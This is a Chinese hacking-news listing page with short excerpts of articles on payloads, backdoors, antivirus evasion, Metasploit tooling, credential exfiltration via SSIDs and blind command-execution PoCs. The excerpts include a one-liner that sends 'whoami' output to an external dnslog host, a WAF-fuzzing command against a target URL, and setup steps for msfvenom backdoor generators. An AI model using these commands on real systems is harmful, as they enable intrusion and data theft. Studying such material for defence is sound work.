记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

后门使用粘贴网址来保存payload

网站后门后门是攻击者故意留下用于之后访问站点的恶意软件。黑客喜欢在不同的位置注入代码来增加保持对网站控制权的机会,这样就可以继续感染受害者网站了。今年都在讨论解码含有PHP函数的复杂恶意软件的新方法。常见的PHP函数有:· eval, 把一段字符串当作PHP语句来执行· create_function, 主要用来创建匿名函数· preg_replace, 正则查找替换函数· assert, 断言函数· base64_decode.根据最新的网站被黑报告,过去的一年:· 被黑的网站中有71%隐藏有基于PHP的后门。· 这些后门的有效性来源于大多数网站扫描技术的绕
发布时间:2018-10-04 12:20 | 阅读:96883 | 评论:0 | 标签:技术 payload 后门

Meterpreter详解与渗透实战

Payload Payload又称为攻击载荷,主要是用来建立目标机与攻击机稳定连接的,可返回shell,也可以进行程序注入等。 Payload有几种类型: singles:独立载荷,可直接植入目标系统并执行相应的程序,如:shell_bind_tcp这个payload。 stagers:传输器载荷,用于目标机与攻击机之间建立稳定的网络连接,与传输体载荷配合攻击。通常该种载荷体积都非常小,可以在漏洞利用后方便注入,这类载荷功能都非常相似,大致分为bind型 reverse型,bind型是需要攻击机主动连接目标端口的;而reverse型是目标机会反连接攻击机,需要提前设定好连接攻击机的ip地址和端口号。 stages:传输体载荷,如shell,meterpreter等。在stagers建立好稳定的连接后,攻击机将s
发布时间:2017-06-08 21:25 | 阅读:148537 | 评论:0 | 标签:技术控 Meterpreter Payload 渗透实战

一种用于在Python字节码中嵌入Payload的隐写工具 – Stegosaurus

Stegosaurus 本文将给大家介绍这款名叫Stegosaurus的隐写工具,它允许我们在Python字节码文件(pyc或pyo)中嵌入任意Payload。由于编码密度较低,因此我们嵌入Payload的过程既不会改变源代码的运行行为,也不会改变源文件的文件大小。Payload代码会被分散嵌入到字节码之中,所以类似strings这样的代码工具无法查找到实际的Payload。Python的dis模块会返回源文件的字节码,然后我们就可以使用Stegosaurus来嵌入Payload了。在本文发稿时,还没有任何针对这种Paylaod嵌入技术的有效检测方法。 Stegosaurus下载地址:【点我下载】 注:Stegosaurus仅支持Python3.6及其以下版本。 工具使用 $ python3 -m ste
发布时间:2017-03-20 09:50 | 阅读:93678 | 评论:0 | 标签:工具 payload Stegosaurus 隐写

NativePayload_DNS:通过DNS传输的后门Payload和绕过反病毒的项目

项目主页 https://github.com/DamonMohammadbagher/NativePayload_DNS 简介 NativePayload_DNS是一款用于通过DNS传输的后门有效负载传输和绕过反病毒的C#代码项目,适用于安全研究人员测试杀毒软件的漏洞,请勿用于非法用途! 参考资料: 后门利用DNS传送信息绕过杀毒软件:https://www.linkedin.com/pulse/bypassing-anti-viruses-transfer-backdoor-payloads-dns-mohammadbagher 后门利用DNS传送信息绕过杀毒软件:https://www.peerlyst.com/posts/bypassing-anti-viruses-with-transfer-ba
发布时间:2017-03-09 11:40 | 阅读:227818 | 评论:0 | 标签:工具 DNS传输 Payload 后门 绕过反病毒

Flask框架安全性科普

前言 在本文中我们将讨论Flask框架中的安全特性以及一些潜在的问题,例如服务端模版注入,跨站脚本,HTML属性注入攻击。如果你还没有体验过Flask带来的乐趣,建议可以先用用。Flask是一个使用Python编写的强大的轻量级Web应用框架(毕竟是Python)。 谈谈注入 对于表示层,Flask利用Jinga2引擎,其使用方便,自动转义.html,htm,xml以及.xhtml文件中的内容。Flask允许在Python源代码中使用HTML字符串创建模版,Flask内部使用本地线程对象,这样就可以不用为了线程安全的缘故在同一个请求中在函数之间传递对象。 服务端模版注入 Flask框架中提供的模版引擎可能会被一些无量开发者利用引入一个服务端模版注入漏洞,如果对此感到有些困惑可以看看James Kettle在黑帽
发布时间:2016-12-16 15:50 | 阅读:118190 | 评论:0 | 标签:Web安全 Flask注入 Payload xss 文件读取 服务端模版注入

WAFNinja:灵活的WAF自动化Fuzz工具

WAFNinja是一款用python写的命令行工具,它可以帮助渗透测试人员免去部分手动输入的烦恼。此外,WAFNinja强大的扩展性,在团队协作中显得非常适用。 工具简介 这款工具里有许多的攻击payload和用于fuzz的字符串,都储存在附带的sqlite数据库文件里。另外,WAFNinja支持HTTP的GET和POST请求,也支持带上cookie。当然,必要的时候,我们还可以设置代理。 大致用法: wafninja.py [-h] [-v] {fuzz, bypass, insert-fuzz, insert-bypass, set-db} ... 下面给出部分案例: fuzz: python wafninja.py fuzz -u "http://www.target.com/in
发布时间:2016-11-30 16:45 | 阅读:138303 | 评论:0 | 标签:工具 fuzz payload SQLite waf

如何使用WLAN的SSID提取用户的凭证数据

这几天,我一直都在研究Windows的无线热点(承载网络)功能。在研究的过程中,我脑海里突然冒出了一个非常有实用性的想法:用无线热点的SSID来进行数据提取。因为SSID最多只支持32字节的数据,所以我们并没有多少可以提取的数据。不过,我们的确可以从如此有限的数据中提取出像用户凭证这样的信息。 脚本介绍 为此我编写了一个PowerShell脚本,在这个脚本的帮助下,我们仅仅通过无线网络的SSID就可以提取出目标数据了。 这个脚本(Invoke-SSIDExfil.ps1)提供了多种数据提取选项,我们可以根据自己的需求来进行设置。因为我们现在的主要目标就是提取出用户的凭证数据,因此我们的脚本使用了Invoke-CredentialsPhish脚本的实现逻辑来提示用户输入凭证信息,并捕获到凭证的明文数据。接下来,
发布时间:2016-11-29 07:35 | 阅读:102536 | 评论:0 | 标签:工具 无线安全 payload powershell

打造不被检测的Metasploit WAR

在渗透测试期间,目标服务器如果是Windows的,目标服务器可能安装有JAVA版管理管理控制程序(例如:WAS、JBOSS和Tomcat),该服务器具有默认或者是可猜测(可以进行爆破攻击)的管理凭据。 一种思路是上传一个Metasploit生成的WAR应用程序以便成功控制服务器,不过结果往往不尽人意… 我们的实验环境中,使用IBM的Websphere Application Server (WAS),WAS使用端口为:9060/HTTP或者9043/HTTPS: http://IP:9060/ibm/console https://IP:9043/ibm/consoler 注意: WAS通常使用本地管理员权限运行,所以通过上传执行payload可以取得管理员权限。 使用msfvenom生成WAR
发布时间:2016-10-12 22:10 | 阅读:113856 | 评论:0 | 标签:Web安全 jboss metasploit Metasploit WAR msfvenom Payload tomca

通过远程资源注入的xss利用分析

0x1 背景 为了清晰的分析XSS攻击的本质,akamai威胁研究团队通过云安全情报平台研究了一周的XSS跨站脚本攻击。我们的目标是识别脆弱的攻击向量并且使用特殊的技术进行远程资源注入攻击尝试简单的请求。具体来说,我们分析了xss攻击并试图将远程javascript资源嵌入页面中。这些攻击形成了友好的对比,也证明了浏览器的javascript引擎通过执行一些XSS Payload等来触发xss攻击,请不要试图攻击终端用户(pc用户)。 0x2 分析的范围 今年早些时候,我们分析了7天的javascript注入。我们利用网络识别请求,包括调用远程javascript资源,然后我们更深层次的分析javascript代码的目的。 0x3 结果 我们分析发现,98%的远程javascript代码调用是合法的,如:
发布时间:2016-10-10 21:50 | 阅读:110296 | 评论:0 | 标签:Web安全 beef Payload xss xss平台 会话窃取 广告植入 广告欺骗 注入

TheFatRat:Msfvenom免杀后门生成工具

项目主页 https://github.com/screetsec/thefatrat 本工具能使用msfvenom生成后门,程序能够用meterpreter reverse_tcp payload编译C语言程序,并能够绕过杀软。 自动化metasploit功能 检查metasploit服务是否启动 建造Windows, Linux, Android 和Mac的meterpreter reverse_tcp payload 开启多个meterpreter reverse_tcp监听 searchsploit快速搜索 免杀 进入Msfconsole 自动运行后门 目标如果没有开启UAC,你就可以这些文件复制到CD或USB。修改图标或者后缀 安装要求 linux操作系统,推荐Kali Linux 2或Kal
发布时间:2016-09-20 05:30 | 阅读:342780 | 评论:0 | 标签:工具 linux Meterpreter Msfconsole msfvenom Payload TheFatRat

libenom:快速创建MSFvenom payload

项目主页 https://github.com/bounteous/libenom 什么是Libenom? 一款快速创建MSFvenom payload的工具 环境要求 Linux环境下( Ubuntu, Debian, Mint) 推荐:Kali Linux 2.0 sana,rolling, Parrot OS, Blackarch, Dracos ,Lionsec 安装 git clone https://github.com/bounteous/libenom.git cd libenom chmod +x libenom.py 使用 执行 ./libenom.py 来显示所有的选项。例如:你可以先创建一个配置文件命名为”Profile1″用 -C 选项将它分配给msfv
发布时间:2016-09-16 21:50 | 阅读:96768 | 评论:0 | 标签:工具 Kali Linux libenom msfvenom Payload

Osx Apache Code To Reveal CVE-2013-0966 漏洞分析

0x00 写在开头 这个漏洞从cve编号可以看出是三年前的了,当时关注的人并不多,也没有对外放出漏洞分析的Paper,可能是使用Osx Server做web服务器没有普及吧。不过这个漏洞的确很暴力。 0x01 漏洞分析 最开始是在本地发现的,在请求文件名中插入BOM头字符会直接返回后端的代码 当时此漏洞的描述是: The Apple mod_hfs_apple module for the Apache HTTP Server in Apple Mac OS X before 10.8.3 does not properly handle ignorable Unicode characters, which allows remote attackers to bypass intended directo
发布时间:2016-08-29 12:20 | 阅读:106745 | 评论:0 | 标签:逆向破解 AMPPS apache Code To Reveal CVE-2013-0966 MAMP Osx Payl

Xen SMEP (and SMAP) bypass

介绍 在先前的博客文章1里,我讨论了我探索Xen的SYSRET bug的流程。我有提到,我能够绕过SMEP,但是我并没有说具体的细节,因为我想做一些深入的研究–我觉得我在Xen使用的绕过SMEP的方法在linux下也适用。 当时我还不知道,这个技术在2014年中旬就已经被发表出来了,叫做”ret2dir”(return-to-direct-mapped-memory)。这个技术已经被公开了,我接下来要说的就是关于”如何利用Xen的direct mapped memory(直接映射内存)来绕过SMEP和SMAP机制”,以及“如何使用我的exploit绕过SMEP并且简化dom0-domU的数据隧道“。 据我所知,目前还没有公开讨论的利用ret2dir在Xen上进行exploit的文章。 SMEP 和 SMAP 简
发布时间:2016-08-22 16:55 | 阅读:261420 | 评论:0 | 标签:逆向破解 bypass Payload SMAP SMAP绕过 SMEP SMEP绕过 Xen

一次完整的从webshell到域控的探索之路

前言 内网渗透测试资料基本上都是很多大牛的文章告诉我们思路如何,但是对于我等小菜一直是云里雾里。 于是使用什么样的工具才内网才能畅通无阻,成了大家一直以来的渴求。 今天小菜我本着所有师傅们无私分享的精神,特将三年内求师傅,求妹子,求神器所得,经过整理后,关键的知识点写出来。 相关知识点总结如下: 免杀 payload 的生成,请使用 Veil msf 在 meterpreter 下的提权尝试 msf 在 meterpreter 下的 bypassuac 尝试 内网渗透测试过程中的信息关联 meterpreter 的路由添加以及相关扫描 Powershell 在 meterpreter 下面的使用 Meterpreter 的 post 模块使用 Msf 的 custom 自己生成的 payload 的使用 进
发布时间:2016-08-21 00:35 | 阅读:196099 | 评论:0 | 标签:内网渗透 bypassuac cimoom dumphash Empire hashdump Impersonate_t

使用Powershell反弹Meterpreter Shell

撸站时难免会遇到一些比较特殊的情况,遇到一个可以执行命令的点(Windows,可连外网),却无法获得回显;这种情况下我通常会用这几种方法去尝试: 使用CloudEye获取命令执行的结果 找Web路径写WebShell 下载一个MSF的Payload直接反弹 某些情况下目标直接对公网开放3389,直接加个账户用完再删… 先说第一种方法, 使用CloudEye获取回显结果: for /F %x in ('whoami') do start http://cmd.xxxxx.dnslog.info/[%x].jpg执行这条命令,会调用默认的浏览器去打开后面的地址,我们可以获取到whoami的命令执行结果。 这里有一点比较坑的情况是如果结果中一行有空格,那这一行空格后面的结果会丢掉。 比如我执行Dir
发布时间:2016-08-16 21:05 | 阅读:99899 | 评论:0 | 标签:Web安全 CloudEye Meterpreter Shell Payload powershell webshell

无回显命令执行PoC编写方法(Apache Shiro Java反序列化)

概要 前段时间Mottoin发布了《Apache Shiro Java 反序列化漏洞分析》的文章 Apache Shiro 是 Apache 软件基金会的顶级项目,在 Java 应用中首选的授权验证、授权、密码学和会话管理框架。 近日 Apache Shiro 的 JIRA 中提到 Shrio 中的 Cookie 管理存在安全问题,在场景合适的情况下,攻击者可以通过控制本地的Cookie 内容导致 Getshell ,最终获取应用服务器控制权限。 今天就讲讲Apache Shiro Java反序列化无回显命令执行PoC编写方法 无回显 命令成功执行与否,无法从web获取到标志性的信息,Java反序列化漏洞即属于该类型。 验证方法 针对无回显的命令执行漏洞,让目标机执行wget、nc或者curl等命令,然后在公网
发布时间:2016-08-14 22:35 | 阅读:143008 | 评论:0 | 标签:Web安全 Apache Shiro CloudEye Java反序列化 Payload poc seebug 无回显命

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云